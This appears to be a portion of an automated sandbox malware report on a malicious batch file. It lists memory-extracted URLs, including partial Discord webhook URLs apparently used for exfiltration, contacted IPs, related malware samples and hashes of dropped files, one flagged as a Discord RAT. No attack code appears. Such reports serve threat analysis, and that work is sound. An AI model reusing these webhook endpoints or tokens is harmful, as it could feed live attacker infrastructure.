        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000009.00000002.1496227351.0000026993671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1639610296.000002640CA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1789270547.0000021A9C091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1961641784.00000224A3881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2166565147.0000025C1B5CC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://api.msn.com/uo | explorer.exe, 00000017.00000003.2618054008.000000000913A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306435911.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304478538.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2328373122.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2709660093.000000000913A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        http://nuget.org/NuGet.exe | powershell.exe, 00000009.00000002.1519896951.00000269A3822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1519896951.00000269A36DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024781632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1602787494.00000247901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1602787494.000002479006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1639610296.000002640E430000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1718613317.000002641CC11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1718613317.000002641CADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1915213464.0000021AAC10A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1915213464.0000021AAC240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2116770833.00000224B38F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 0000000E.00000002.1639610296.000002640DEEE000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1Ui | powershell.exe, 00000023.00000002.2398128595.000002D2C9C3A000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        http://pesterbdd.com/images/Pester.png | powershell.exe, 00000014.00000002.1961641784.00000224A3AB1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000014.00000002.1961641784.00000224A3AB1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://go.micro | powershell.exe, 00000009.00000002.1496227351.00000269942A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024780C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1961641784.00000224A44B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://contoso.com/Icon | powershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        http://crl.ver) | svchost.exe, 00000019.00000002.2704857982.000001774DCCE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://g.live.com/odclientsettings/ProdV2/C: | svchost.exe, 00000019.00000003.2260956832.000001774F0B0000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        http://www.microsoft. | powershell.exe, 00000015.00000002.2222057483.0000025C336DF000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://powerpoint.office.com | explorer.exe, 00000017.00000003.2305006917.00000000091E9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304007048.00000000091E9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSR | powershell.exe, 00000023.00000002.2386798148.000002D2C6330000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://ptb.discord | powershell.exe, 00000023.00000002.2398128595.000002D2C9C3A000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://github.com/Pester/Pester | powershell.exe, 00000014.00000002.1961641784.00000224A3AB1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0be | WMIC.exe, 00000004.00000002.1453877128.0000022707420000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://g.live.com/odclientsettings/Prod/C: | svchost.exe, 00000019.00000003.2260956832.000001774F121000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://api.msn.com/v1/news/Feed/Windows?Vm | explorer.exe, 00000017.00000003.2618054008.000000000913A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306435911.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304478538.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2328373122.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2709660093.000000000913A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        http://crl.m | powershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmp | false | |
                                                                                  unknown
                                                                                  https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&ocexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-fexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://www.microsoft.cotexplorer.exe, 00000017.00000003.2339756407.000000000BC47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://aka.ms/pscore68powershell.exe, 00000009.00000002.1496227351.0000026993671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1639610296.000002640CA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1789270547.0000021A9C091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1961641784.00000224A3881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2166565147.0000025C1B5CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2166565147.0000025C1B59A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandinexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://discord.com/api/webhooks/1292044762974785547/-sVDk3powershell.exe, 00000009.00000002.1493410501.0000026991744000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://www.msn.com:443/en-us/feedexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://oneget.orgpowershell.exe, 0000000E.00000002.1639610296.000002640DEEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://www.msn.com/en-us/weather/topstories/accuweather-el-niexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
162.159.137.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | false
162.159.128.233 | ptb.discord.com | United States | 13335 | CLOUDFLARENETUS | false
185.199.108.153 | diva.ink | Netherlands | 54113 | FASTLYUS | true

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1526626
Start date and time: 2024-10-06 13:35:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 45
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: main.bat.bin.bat
Detection: MAL
Classification: mal100.troj.expl.evad.winBAT@46/42@5/4
EGA Information:
• Successful, ratio: 28.6%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 29
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .bat
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, UserOOBEBroker.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, audiodg.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, svchost.exe, StartMenuExperienceHost.exe, TextInputHost.exe, mobsync.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212, 93.184.221.240, 52.165.164.15, 13.85.23.206, 4.245.163.56, 204.79.197.203, 184.28.90.27, 2.23.209.133, 2.23.209.179, 2.23.209.130, 2.23.209.140, 2.23.209.189, 2.23.209.185, 2.23.209.182, 2.23.209.187, 2.23.209.149, 2.23.209.148, 2.23.209.177, 2.23.209.176
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, p-static.bing.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, r.bing.com, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, r.bing.com.edgekey.net, a-0003.a-msedge.net, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, api-msn-com.a-0003.a-msedge.net
• Execution Graph export aborted for target powershell.exe, PID 1372 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 1440 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 3272 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 4424 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6168 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
07:36:06 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
07:36:09 | API Interceptor | 93x Sleep call for process: powershell.exe modified
07:37:26 | API Interceptor | 321x Sleep call for process: explorer.exe modified
07:37:27 | API Interceptor | 2x Sleep call for process: svchost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
162.159.137.232 | Bootstrapper V1.19.exe | malicious | Python Stealer, Empyrean, Discord Token Stealer | 
162.159.137.232 | https://buxb0t.github.io/https-www.instagram.com-reel-CtFCB1_MvyH- | malicious | HTMLPhisher | 
162.159.137.232 | http://bafybeid2klgyiphng6ifws5s35aor57wfi3so6koe2w4ggoacn6gqghegm.ipfs.dweb.link/ | malicious | Unknown | 
162.159.137.232 | SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe | malicious | Unknown | 
162.159.137.232 | https://mj.ostep.net/acknowledgements | malicious | Unknown | 
162.159.137.232 | SecuriteInfo.com.Win32.MalwareX-gen.5836.3825.exe | malicious | Unknown | 
162.159.137.232 | SecuriteInfo.com.Win32.MalwareX-gen.5836.3825.exe | malicious | Unknown | 
162.159.137.232 | ied6tTdm.posh.ps1 | malicious | Unknown | 
162.159.137.232 | https://clicker.extremelyorange.com/ | malicious | Unknown | 
162.159.137.232 | https://hkdiscord.antsoon.com/ | malicious | Unknown | 
162.159.128.233 | file.exe | malicious | LummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRAT | discord.com/phpMyAdmin/
185.199.108.153 | http://detection.fyi | malicious | NetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, Xmrig | detection.fyi/
185.199.108.153 | http://sahalnp.github.io/Facebook_clone/ | malicious | HTMLPhisher | sahalnp.github.io/Facebook_clone/
185.199.108.153 | http://docs-trezor-cdn.github.io/ | malicious | HTMLPhisher | docs-trezor-cdn.github.io/
185.199.108.153 | http://pixlo8d.github.io/instagram-login-clone | malicious | Unknown | pixlo8d.github.io/instagram-login-clone
185.199.108.153 | http://gopuaakash.github.io/facebook/ | malicious | HTMLPhisher | gopuaakash.github.io/facebook/
185.199.108.153 | http://servl-lnt.github.io/ap/ | malicious | HTMLPhisher | servl-lnt.github.io/ap/
185.199.108.153 | http://propertyinaustralia.github.io/propertyinaustralia/property.html | malicious | HTMLPhisher | propertyinaustralia.github.io/propertyinaustralia/property.html
185.199.108.153 | http://aaliyan-ahmed08.github.io/netflix-clone | malicious | HTMLPhisher | aaliyan-ahmed08.github.io/netflix-clone
185.199.108.153 | http://innocent321.github.io/Netflix-Hub | malicious | HTMLPhisher | innocent321.github.io/Netflix-Hub
185.199.108.153 | http://shantanu-deshmane.github.io/Netflix-login | malicious | HTMLPhisher | shantanu-deshmane.github.io/Netflix-login
Match | Associated Sample Name / URL | Detection | Threat Name | Context
discord.com | SolaraV3.exe | malicious | Blank Grabber | 162.159.136.232
discord.com | Bootstrapper V1.19.exe | malicious | Python Stealer, Empyrean, Discord Token Stealer | 162.159.137.232
discord.com | https://buxb0t.github.io/https-www.instagram.com-reel-CtFCB1_MvyH- | malicious | HTMLPhisher | 162.159.137.232
discord.com | https://buxb0t.github.io/https-www.instagram.com-reel-CtFCB1_MvyH-/ | malicious | HTMLPhisher | 162.159.135.232
discord.com | https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/ | malicious | Unknown | 162.159.135.232
discord.com | HyZh4pn0RF.exe | malicious | Creal Stealer | 162.159.136.232
discord.com | https://bafybeih5zpu7rzaoeodorqhminsbsmv3eswg6px7qixdtiwflfle6cv364.ipfs.dweb.link/ | malicious | Unknown | 162.159.128.233
discord.com | http://bafybeid2klgyiphng6ifws5s35aor57wfi3so6koe2w4ggoacn6gqghegm.ipfs.dweb.link/ | malicious | Unknown | 162.159.137.232
discord.com | https://game-repack.site/2024/09/26/bloodborne | malicious | Unknown | 162.159.136.232
discord.com | SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe | malicious | Unknown | 162.159.128.233
bg.microsoft.map.fastly.net | http://pub-840f88e3288a4f17b5efba5dbcc493d8.r2.dev/index.html | malicious | HTMLPhisher | 199.232.214.172
bg.microsoft.map.fastly.net | https://pub-e3974f4c00f54fc28eadd63f1eacad4a.r2.dev/index.html | malicious | HTMLPhisher | 199.232.214.172
bg.microsoft.map.fastly.net | http://pub-0c062afe82544962aee957f640f2ca2d.r2.dev/index.html | malicious | HTMLPhisher | 199.232.214.172
bg.microsoft.map.fastly.net | http://pub-6906da2464104cdc84bd9a9fa52dde76.r2.dev/index.html | malicious | HTMLPhisher | 199.232.214.172
bg.microsoft.map.fastly.net | http://pub-30984890657744baad27fb8faa5b5cc9.r2.dev/index.html | malicious | HTMLPhisher | 199.232.210.172
bg.microsoft.map.fastly.net | https://free-5464198.webadorsite.com/ | malicious | HTMLPhisher | 199.232.210.172
bg.microsoft.map.fastly.net | http://distrosourcess8.sg-host.com/ | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | https://maliyedavasorgu.org/sorgu | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | http://d2qqkq2ozhynzf.cloudfront.net/ | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | https://token-portaldapp.pages.dev/ | malicious | HTMLPhisher | 199.232.214.172
ptb.discord.com | TMPN.exe | malicious | Skuld Stealer | 162.159.128.233
                                                                                                                            zamPeEkHWr.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                            • 162.159.138.232
                                                                                                                            IDLBk4XMUa.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                            • 162.159.138.232
                                                                                                                            golang-modules.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.136.232
                                                                                                                            golang-modules.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.137.232
                                                                                                                            SetupSpuckwars_1.15.5.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.128.233
                                                                                                                            SetupSpuckwars_1.15.5.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.128.233
                                                                                                                            KzqQe0QtRd.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.137.232
                                                                                                                            PAP46E1UkZ.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.128.233
                                                                                                                            A4AxThCBqS.exeGet hashmaliciousNanocore, Luna Logger, Umbral StealerBrowse
                                                                                                                            • 162.159.136.232
                                                                                                                            windowsupdatebg.s.llnwi.nethttps://maliyedavasorgu.org/sorguGet hashmaliciousUnknownBrowse
                                                                                                                            • 87.248.205.0
                                                                                                                            http://www.nftexpodubai.com/fwyttw/wp.phpGet hashmaliciousUnknownBrowse
                                                                                                                            • 87.248.204.0
                                                                                                                            http://www.grandsignatureyercaud.com/Get hashmaliciousUnknownBrowse
                                                                                                                            • 87.248.204.0
                                                                                                                            http://www.nesianlife.com/Get hashmaliciousUnknownBrowse
                                                                                                                            • 87.248.205.0
                                                                                                                            https://www.cpmrevenuegate.com/n6zwydwb?key=61b0420b9b99c2ec074ef98b4030ef8cGet hashmaliciousAnonymous ProxyBrowse
                                                                                                                            • 87.248.204.0
                                                                                                                            file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                            • 178.79.238.0
                                                                                                                            file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                            • 87.248.204.0
                                                                                                                            f2e7fcb20146.exeGet hashmaliciousStealcBrowse
                                                                                                                            • 87.248.204.0
                                                                                                                            https://new-doctor-booking-php-mysql.filemakrxpert.com/Get hashmaliciousUnknownBrowse
                                                                                                                            • 87.248.204.0
                                                                                                                            https://www.thefirsthbcu.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 178.79.208.1
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                            No context
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.80220226784722
Encrypted: false
SSDEEP: 1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAy:RJE+Lfki1GjHwU/+vVhWqp7
MD5: A089EB9D32487104027FABFD04A8400A
SHA1: ED1197C5057D6C93BECBBB19DAD7BDEB419FEB42
SHA-256: AFA58CB6EB11E114A49FE8C5E122BA9D70EBF1B2ED46970C054BF1BD6F1C13F6
SHA-512: CFCB8B544EB78611438FD2265057A5B2C26626319F260B09D53817002614AEECEA8CAB87406FEF71487FB2BCE77D8DCDB31146FF7DAE16ADDD23D7C5E6E73D0A
Malicious: false
                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6115e02f, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1048576
                                                                                                                            Entropy (8bit):0.9433522114881583
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:rSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:razaHvxXy2V2UR
                                                                                                                            MD5:0C71F527FFFE04EC8B31082859BF8CDB
                                                                                                                            SHA1:29213069528F2D7C8500DC8036D85988167FFDFC
                                                                                                                            SHA-256:FFC5A1DC20D29D1BF10E78E6FED90882D6B85895CDD2F4933A54B76DA7DC5A67
                                                                                                                            SHA-512:F7A9DCA0D97ABFFFCFB216A18B3E5C537A2C325E1E23CC517786F3698C61FD7DC2435E29F4E047914733B630FC20E1867F091CE4D9979DFF7F08A78D2E66376F
                                                                                                                            Malicious:false
                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):16384
                                                                                                                            Entropy (8bit):0.08161364465695778
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Qfz/lKYeJXnll/nqlFcl1ZUllllx9VlAllGBnX/l/Tj/k7/t:Q7/lKzJXnll/qlFclQ/lNPA254
                                                                                                                            MD5:03068336943704492815C9785D1AC289
                                                                                                                            SHA1:6AF5EAC543DAA7FD10F93573F374E2EB6A742E34
                                                                                                                            SHA-256:8093AEEF1F6987D60CCE2C4DB75DB863BD638C95346D42FE350F41B3494F88A7
                                                                                                                            SHA-512:582EAF01E4BDB4D7FC062C073CFB18D62805F6D688756E6EEB1D9EB1996C21570DBA287C2A310AB17A849F8F6ECD17F5BC8623820C47C777EAE91E21C2204CE1
                                                                                                                            Malicious:false
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):80384
                                                                                                                            Entropy (8bit):5.482297427900561
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:52WjO8XeEXFh5P7v88wbjNrfxCXhRoKV6+V+6PIC:5Zv5PDwbjNrmAE+mIC
                                                                                                                            MD5:BB4F0729F484BC823BDC393F2FD4B723
                                                                                                                            SHA1:E7F63627162230106FB2F19C4F349A833CC71CAE
                                                                                                                            SHA-256:DC89E0477362F409D4AD88D010D093B755F4B5224847B7D4D52C570AA60F664D
                                                                                                                            SHA-512:E58246F48DCB269838722D182B0E0AB546EE4C92DD8668D10D77EFF70B4C4552E9EFAB8DDFD424319B9CFC84FAB08C709F6F7E5AD038AC019C7ABEDA76B9B946
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_DiscordRat, Description: Yara detected Discord Rat, Source: C:\Users\Public\Documents\Secret Document\exe.exe, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):107416
                                                                                                                            Entropy (8bit):4.001038701520514
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:Ol8dkJGMQqXWRjk0QsVWoh3NBLxKNCjBlzTPieb6PR1vPipaJd5m5oypQqW3/gLD:jkxQqwVWohRqeJLhOihGxnl9EFO7K2I
                                                                                                                            MD5:CC7F4C9126079B1E1A9166DBBE4A98F2
                                                                                                                            SHA1:B66CCFDE8AC4EBB4A93977D5E63A5B006CA76289
                                                                                                                            SHA-256:F0B9173C390FD7BC6109C59496BF82570A54FCFE0D6A4D5BA04F9A263E7E1F70
                                                                                                                            SHA-512:7000B242736FA3C5EAFC991399817B52F1C6CC237741B58FDF38A88AB418943BFFB2389BDBE5AC0CA6B29CBC7DC0CDBED301C9192B931F643ABA52167677A414
                                                                                                                            Malicious:false
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):107416
                                                                                                                            Entropy (8bit):4.001352432292237
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:tl8fkpGMQqXWRjk0QsVWoh3NBLxKNCjBlzTPieb6PR1vPipaJd5m5oypQqW3/gLB:AkRQqwVWohRqeJLhOihGxnl9EFO7K26
                                                                                                                            MD5:302F9192B4222D8EEA1C10BA62869761
                                                                                                                            SHA1:ECDA95BF2C0D69BBC30785BB3D5353F79653297B
                                                                                                                            SHA-256:5A43F0FF8986CD6363D0E2E117C9F55B5205239690673C80A3009A2DD92A2E9A
                                                                                                                            SHA-512:D6AB18B09CF79F49186D1C66AD032943B97FCFC6EE4AA14B220AE00051EC8527AC94FDD72615C273501E9E05744AA00507C16944F7D33DB001C8C01EF80B94E3
                                                                                                                            Malicious:false
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:JSON data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):750
                                                                                                                            Entropy (8bit):5.169088473097709
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:YWgc2X6AvH+SA33kxmwzkH+2yrZMAdrKC8K/y8kEhq1HLxycXNNZ/TCB893c3Z:Yzc2zHokx4Ht0drc6hE14
                                                                                                                            MD5:DB2518E20EA958BB9EA0FC4224E07DFC
                                                                                                                            SHA1:9994E6F0C9BF99F98EB84EB3F95FE44C738B12C1
